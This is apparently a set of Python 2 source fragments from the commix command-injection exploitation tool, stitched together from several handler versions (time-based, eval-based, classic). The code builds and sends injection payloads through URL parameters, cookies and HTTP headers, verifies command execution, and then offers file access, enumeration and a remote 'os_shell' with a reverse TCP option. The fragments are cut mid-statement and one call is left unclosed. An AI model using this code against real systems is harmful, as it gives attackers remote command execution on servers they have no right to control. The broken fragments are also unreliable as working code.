"--verbose" option. elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) payload_msg = payload.replace("\n", "\\n") sys.stdout.write( settings.print_payload(payload_msg) + "\n") # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) how_long = tb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) how_long = tb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) how_long = tb_injector.referer_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) how_long = tb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. how_long, vuln_parameter = tb_injector.injection_test( payload, http_request_method, url) # Statistical analysis in time responses. how_long_statistic.append(how_long) # Injection percentage calculation percent = ((num_of_chars * 100) / total) float_percent = "{0:.1f}".format( round( ((num_of_chars * 100) / (total * 1.0)), 2)) if percent == 100 and no_result == True: if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = "" else: if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : # Time relative false positive fixation. false_positive_fixation = False if len(TAG) == output_length: # Simple statical analysis statistical_anomaly = True if len(set(how_long_statistic[0:5]) ) == 1: if max(xrange( len(how_long_statistic) ), key=lambda x: how_long_statistic[ x]) == len(TAG) - 1: statistical_anomaly = False how_long_statistic = [] if timesec <= how_long and not statistical_anomaly: false_positive_fixation = True else: false_positive_warning = True # Identified false positive warning message. if false_positive_warning: warn_msg = "Unexpected time delays have been identified due to unstable " warn_msg += "requests. This behavior may lead to false-positive results.\n" sys.stdout.write( "\r" + settings.print_warning_msg( warn_msg)) while True: if not menu.options.batch: question_msg = "How do you want to proceed? [(C)ontinue/(s)kip/(q)uit] > " sys.stdout.write( settings. print_question_msg( question_msg)) proceed_option = sys.stdin.readline( ).replace("\n", "").lower() else: proceed_option = "" if len(proceed_option) == 0: proceed_option = "c" if proceed_option.lower( ) in settings.CHOICE_PROCEED: if proceed_option.lower( ) == "s": false_positive_fixation = False raise elif proceed_option.lower( ) == "c": timesec = timesec + 1 false_positive_fixation = True break elif proceed_option.lower( ) == "q": raise SystemExit() else: err_msg = "'" + proceed_option + "' is not a valid answer." print settings.print_error_msg( err_msg) pass # Check if false positive fixation is True. if false_positive_fixation: false_positive_fixation = False settings.FOUND_HOW_LONG = how_long settings.FOUND_DIFF = how_long - timesec if false_positive_warning: time.sleep(1) randv1 = random.randrange(1, 10) randv2 = random.randrange(1, 10) randvcalc = randv1 + randv2 if settings.TARGET_OS == "win": if alter_shell: cmd = settings.WIN_PYTHON_DIR + "python.exe -c \"print (" + str( randv1) + " + " + str( randv2) + ")\"" else: cmd = "powershell.exe -InputFormat none write (" + str( randv1) + " + " + str( randv2) + ")" else: cmd = "expr " + str( randv1) + " + " + str( randv2) + "" # Set the original delay time original_how_long = how_long # Check for false positive resutls how_long, output = tb_injector.false_positive_check( separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response) if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if str(output) == str( randvcalc) and len( TAG ) == output_length: possibly_vulnerable = True how_long_statistic = 0 if not settings.VERBOSITY_LEVEL >= 1: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = "" else: break # False positive else: if not settings.VERBOSITY_LEVEL >= 1: percent = str( float_percent) + "%" info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write( "\r" + settings.print_info_msg( info_msg)) sys.stdout.flush() continue else: if not settings.VERBOSITY_LEVEL >= 1: percent = str(float_percent) + "%" info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write( "\r" + settings.print_info_msg( info_msg)) sys.stdout.flush() continue if not settings.VERBOSITY_LEVEL >= 1: info_msg = "Testing the " + "(" + injection_type.split( " " )[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: break break # Yaw, got shellz! # Do some magic tricks! if (url_time_response == 0 and (how_long - timesec) >= 0) or \ (url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \ (url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) : if (len(TAG) == output_length) and \ (possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level): found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.LOAD_SESSION: possibly_vulnerable = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.VERBOSITY_LEVEL > 1 and not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += ('', ' (JSON)')[ settings.IS_JSON] + the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split( " ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + payload.replace( "\n", "\\n") + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: shell = "" session_handler.injection_point_importation( url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, original_how_long, output_length, is_vulnerable=menu.options.level) #possibly_vulnerable = False else: settings.LOAD_SESSION = False new_line = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: if not menu.options.batch: question_msg = "Do you want to enumerate again? [Y/n] > " enumerate_again = raw_input( "\n" + settings.print_question_msg( question_msg)).lower() else: enumerate_again = "" if len(enumerate_again) == 0: enumerate_again = "y" if enumerate_again in settings.CHOICE_YES: tb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" break elif enumerate_again in settings.CHOICE_NO: new_line = True break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): tb_enumeration.do_check( separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: print "" while True: if not menu.options.batch: question_msg = "Do you want to access files again? [Y/n] > " sys.stdout.write( settings.print_question_msg( question_msg)) file_access_again = sys.stdin.readline( ).replace("\n", "").lower() else: file_access_again = "" if len(file_access_again) == 0: file_access_again = "y" if file_access_again in settings.CHOICE_YES: tb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) break elif file_access_again in settings.CHOICE_NO: if not new_line: new_line = True break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: # if not menu.enumeration_options() and not menu.options.os_cmd: # print "" tb_file_access.do_check( separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Check if defined single cmd. if menu.options.os_cmd: cmd = menu.options.os_cmd check_how_long, output = tb_enumeration.single_os_cmd_exec( separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results( cmd, separator, output, check_how_long) print "" logs.print_logs_notification(filename, url) sys.exit(0) if not new_line: print "" # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break if not menu.options.batch: question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > " sys.stdout.write( settings.print_question_msg( question_msg)) gotshell = sys.stdin.readline().replace( "\n", "").lower() else: gotshell = "" if len(gotshell) == 0: gotshell = "y" if gotshell in settings.CHOICE_YES: if not menu.options.batch: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: if false_positive_warning: warn_msg = "Due to unexpected time delays, it is highly " warn_msg += "recommended to enable the 'reverse_tcp' option.\n" sys.stdout.write( "\r" + settings.print_warning_msg( warn_msg)) false_positive_warning = False try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) if cmd.lower( ) in settings.SHELL_OPTIONS: go_back, go_back_again = shell_options.check_option( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE="") if go_back and go_back_again == False: break if go_back and go_back_again: return True else: if menu.options.ignore_session or \ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # The main command injection exploitation. check_how_long, output = tb_injector.injection( separator, maxlen, TAG, cmd, prefix, suffix, whitespace, timesec, http_request_method, url, vuln_parameter, alter_shell, filename, url_time_response) # Export injection result tb_injector.export_injection_results( cmd, separator, output, check_how_long) if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, output, vuln_parameter) else: output = session_handler.export_stored_cmd( url, cmd, vuln_parameter) print "\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL # Update logs with executed cmds and execution results. logs.executed_command( filename, cmd, output) print "" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass break if no_result == True: if settings.VERBOSITY_LEVEL == 0: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param(url) else : found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0 : found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 # Print the findings to terminal. print Style.BRIGHT + "\n(!) The (" + http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to " + injection_type + "." + Style.RESET_ALL print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + "" print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + "" print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL # Check for any enumeration options. if settings.ENUMERATION_DONE == True : while True: enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower() if enumerate_again in settings.CHOISE_YES: fb_enumeration.do_check(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) break
def eb_injection_handler(url, delay, filename, http_request_method): counter = 1 vp_flag = True no_result = True export_injection_info = False injection_type = "results-based command injection" technique = "eval-based code injection technique" for item in range(0, len(settings.EXECUTION_FUNCTIONS)): settings.EXECUTION_FUNCTIONS[ item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "(" settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS url = eb_injector.warning_detection(url, http_request_method) if not settings.LOAD_SESSION: info_msg = "Testing the " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len( settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.EVAL_PREFIXES: for suffix in settings.EVAL_SUFFIXES: for separator in settings.EVAL_SEPARATORS: # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification( url, technique): url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation( url, http_request_method) checks.check_for_stored_tamper(payload) if settings.RETEST == True: settings.RETEST = False from src.core.injections.results_based.techniques.classic import cb_handler cb_handler.exploitation(url, delay, filename, http_request_method) if not settings.LOAD_SESSION: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = eb_payloads.decision_alter_shell( separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = eb_payloads.decision( separator, TAG, randv1, randv2) suffix = urllib.quote(suffix) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + urllib.quote(")}") in payload: payload = payload.replace( ")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}")) #payload = payload + TAG + "" # Whitespace fixation payload = re.sub(" ", whitespace, payload) if settings.TAMPER_SCRIPTS['base64encode']: from src.core.tamper import base64encode payload = base64encode.encode(payload) else: payload = re.sub(" ", "%20", payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: sys.stdout.write( "\n" + settings.print_payload(payload)) # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = eb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = eb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = eb_injector.referer_injection_test( url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter( settings.INJECT_TAG) response = eb_injector.custom_header_injection_test( url, vuln_parameter, payload) else: found_cookie_injection = False # Check if target host is vulnerable. response, vuln_parameter = eb_injector.injection_test( payload, http_request_method, url) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, delay) # Evaluate test results. shell = eb_injector.injection_test_results( response, TAG, randvcalc) if not settings.VERBOSITY_LEVEL >= 1: percent = ((i * 100) / total) float_percent = "{0:.1f}".format( round(((i * 100) / (total * 1.0)), 2)) if shell == False: info_msg = "Testing the " + technique + "... " + "[ " + float_percent + "%" + " ]" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if str(float_percent) == "100.0": if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent) + "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent) + "%" info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]" sys.stdout.write( "\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = vuln_parameter the_type = " parameter" elif settings.USER_AGENT_INJECTION == True: header_name = " User-Agent" found_vuln_parameter = "" the_type = " HTTP header" elif settings.REFERER_INJECTION == True: header_name = " Referer" found_vuln_parameter = "" the_type = " HTTP header" elif settings.CUSTOM_HEADER_INJECTION == True: header_name = " " + settings.CUSTOM_HEADER_NAME found_vuln_parameter = "" the_type = " HTTP header" else: header_name = "" the_type = " parameter" if http_request_method == "GET": found_vuln_parameter = parameters.vuln_GET_param( url) else: found_vuln_parameter = vuln_parameter if len(found_vuln_parameter) != 0: found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'" # Print the findings to log file. if export_injection_info == False: export_injection_info = logs.add_type_and_technique( export_injection_info, filename, injection_type, technique) if vp_flag == True: vp_flag = logs.add_parameter( vp_flag, filename, the_type, header_name, http_request_method, vuln_parameter, payload) logs.update_payload(filename, counter, payload) counter = counter + 1 if not settings.LOAD_SESSION: print "" # Print the findings to terminal. success_msg = "The" if found_vuln_parameter == " ": success_msg += http_request_method + "" success_msg += the_type + header_name success_msg += found_vuln_parameter + " seems injectable via " success_msg += "(" + injection_type.split( " ")[0] + ") " + technique + "." print settings.print_success_msg(success_msg) print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub( "%20", " ", payload) + Style.RESET_ALL # Export session if not settings.LOAD_SESSION: session_handler.injection_point_importation( url, technique, injection_type, separator, shell[0], vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response=0, delay=0, how_long=0, output_length=0, is_vulnerable=menu.options.level) else: whitespace = settings.WHITESPACE[0] settings.LOAD_SESSION = False # Check for any enumeration options. if settings.ENUMERATION_DONE == True: while True: question_msg = "Do you want to enumerate again? [Y/n/q] > " enumerate_again = raw_input( "\n" + settings.print_question_msg(question_msg) ).lower() if enumerate_again in settings.CHOICE_YES: eb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) print "" break elif enumerate_again in settings.CHOICE_NO: break elif enumerate_again in settings.CHOICE_QUIT: sys.exit(0) else: if enumerate_again == "": enumerate_again = "enter" err_msg = "'" + enumerate_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.enumeration_options(): eb_enumeration.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) if not menu.file_access_options( ) and not menu.options.os_cmd: print "" # Check for any system file access options. if settings.FILE_ACCESS_DONE == True: if settings.ENUMERATION_DONE != True: print "" while True: question_msg = "Do you want to access files again? [Y/n/q] > " sys.stdout.write( settings.print_question_msg(question_msg)) file_access_again = sys.stdin.readline( ).replace("\n", "").lower() if file_access_again in settings.CHOICE_YES: eb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) print "" break elif file_access_again in settings.CHOICE_NO: break elif file_access_again in settings.CHOICE_QUIT: sys.exit(0) else: if file_access_again == "": file_access_again = "enter" err_msg = "'" + file_access_again + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: if menu.file_access_options(): if not menu.enumeration_options(): print "" eb_file_access.do_check( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) print "" # Check if defined single cmd. if menu.options.os_cmd: if not menu.file_access_options(): print "" eb_enumeration.single_os_cmd_exec( separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, delay) # Pseudo-Terminal shell go_back = False go_back_again = False while True: if go_back == True: break question_msg = "Do you want a Pseudo-Terminal? [Y/n/q] > " sys.stdout.write( settings.print_question_msg(question_msg)) gotshell = sys.stdin.readline().replace( "\n", "").lower() if gotshell in settings.CHOICE_YES: print "" print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)" if readline_error: checks.no_readline_module() while True: try: # Tab compliter if not readline_error: readline.set_completer( menu.tab_completer) # MacOSX tab compliter if getattr( readline, '__doc__', '' ) is not None and 'libedit' in getattr( readline, '__doc__', ''): readline.parse_and_bind( "bind ^I rl_complete") # Unix tab compliter else: readline.parse_and_bind( "tab: complete") cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """) cmd = checks.escaped_cmd(cmd) # if settings.VERBOSITY_LEVEL >= 1: # print "" if cmd.lower( ) in settings.SHELL_OPTIONS: os_shell_option = checks.check_os_shell_options( cmd.lower(), technique, go_back, no_result) if os_shell_option == False: if no_result == True: return False else: return True elif os_shell_option == "quit": sys.exit(0) elif os_shell_option == "back": go_back = True break elif os_shell_option == "os_shell": warn_msg = "You are already into an 'os_shell' mode." print settings.print_warning_msg( warn_msg) + "\n" elif os_shell_option == "reverse_tcp": settings.REVERSE_TCP = True # Set up LHOST / LPORT for The reverse TCP connection. reverse_tcp.configure_reverse_tcp( ) if settings.REVERSE_TCP == False: continue while True: if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: result = checks.check_reverse_tcp_options( settings.LHOST) else: cmd = reverse_tcp.reverse_tcp_options( ) result = checks.check_reverse_tcp_options( cmd) if result != None: if result == 0: return False elif result == 1 or result == 2: go_back_again = True settings.REVERSE_TCP = False break # Command execution results. response = eb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Evaluate injection results. shell = eb_injector.injection_results( response, TAG, cmd) if settings.VERBOSITY_LEVEL >= 1: print "" err_msg = "The reverse TCP connection has failed!" print settings.print_critical_msg( err_msg) else: pass else: # The main command injection exploitation. response = eb_injector.injection( separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload( url, delay) if menu.options.ignore_session or\ session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None: # Evaluate injection results. shell = eb_injector.injection_results( response, TAG, cmd) shell = "".join( str(p) for p in shell).replace( " ", "", 1) if not menu.options.ignore_session: session_handler.store_cmd( url, cmd, shell, vuln_parameter) else: shell = session_handler.export_stored_cmd( url, cmd, vuln_parameter) #if shell: if shell != "": shell = "".join( str(p) for p in shell) # if settings.VERBOSITY_LEVEL >= 1: # print "" print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n" else: err_msg = "The '" + cmd + "' command, does not return any output." print settings.print_critical_msg( err_msg) + "\n" except KeyboardInterrupt: raise except SystemExit: raise elif gotshell in settings.CHOICE_NO: if checks.next_attack_vector( technique, go_back) == True: break else: if no_result == True: return False else: return True elif gotshell in settings.CHOICE_QUIT: sys.exit(0) else: if gotshell == "": gotshell = "enter" err_msg = "'" + gotshell + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if no_result == True: print "" return False else: sys.stdout.write("\r") sys.stdout.flush()
def cb_injection_handler(url, timesec, filename, http_request_method): shell = False counter = 1 vp_flag = True no_result = True is_encoded = False export_injection_info = False injection_type = "results-based OS command injection" technique = "classic command injection technique" if not settings.LOAD_SESSION: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 1: print "" i = 0 # Calculate all possible combinations total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) for whitespace in settings.WHITESPACE: for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: if whitespace == " ": whitespace = urllib.quote(whitespace) # Check injection state settings.DETECTION_PHASE = True settings.EXPLOITATION_PHASE = False # If a previous session is available. if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type): try: settings.CLASSIC_STATE = True url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method) checks.check_for_stored_tamper(payload) except TypeError: err_msg = "An error occurred while accessing session file ('" err_msg += settings.SESSION_FILE + "'). " err_msg += "Use the '--flush-session' option." print settings.print_critical_msg(err_msg) raise SystemExit() else: i = i + 1 # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) randv1 = random.randrange(100) randv2 = random.randrange(100) randvcalc = randv1 + randv2 # Define alter shell alter_shell = menu.options.alter_shell try: if alter_shell: # Classic -alter shell- decision payload (check if host is vulnerable). payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.decision(separator, TAG, randv1, randv2) # Define prefixes & suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL == 1: print settings.print_payload(payload) elif settings.VERBOSITY_LEVEL > 1: info_msg = "Generating a payload for injection..." print settings.print_info_msg(info_msg) print settings.print_payload(payload) # Cookie header injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie header injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = cb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent HTTP header injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent HTTP header injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer HTTP header injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer HTTP header injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = cb_injector.referer_injection_test(url, vuln_parameter, payload) # Host HTTP header injection elif settings.HOST_INJECTION == True: # Check if target host is vulnerable to host HTTP header injection. vuln_parameter = parameters.specify_host_parameter( response = cb_injector.host_injection_test(url, vuln_parameter, payload) # Custom HTTP header Injection elif settings.CUSTOM_HEADER_INJECTION == True: # Check if target host is vulnerable to custom http header injection. vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG) response = cb_injector.custom_header_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url) # Try target page reload (if it is required). if settings.URL_RELOAD: response = requests.url_reload(url, timesec) # Evaluate test results. time.sleep(timesec) shell = cb_injector.injection_test_results(response, TAG, randvcalc) if not settings.VERBOSITY_LEVEL >= 1: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if shell == False: info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + float_percent + "%" + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() if float(float_percent) >= 99.9: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" elif len(shell) != 0: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL else: percent = str(float_percent)+ "%" info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]" sys.stdout.write("\r" + settings.print_info_msg(info_msg)) sys.stdout.flush() except KeyboardInterrupt: raise except SystemExit: raise except EOFError: err_msg = "Exiting, due to EOFError." print settings.print_error_msg(err_msg) raise except: continue # Yaw, got shellz! # Do some magic tricks! if shell: found = True no_result = False # Check injection state settings.DETECTION_PHASE = False settings.EXPLOITATION_PHASE = True if settings.COOKIE_INJECTION == True: header_name = " cookie" found_vuln_parameter = 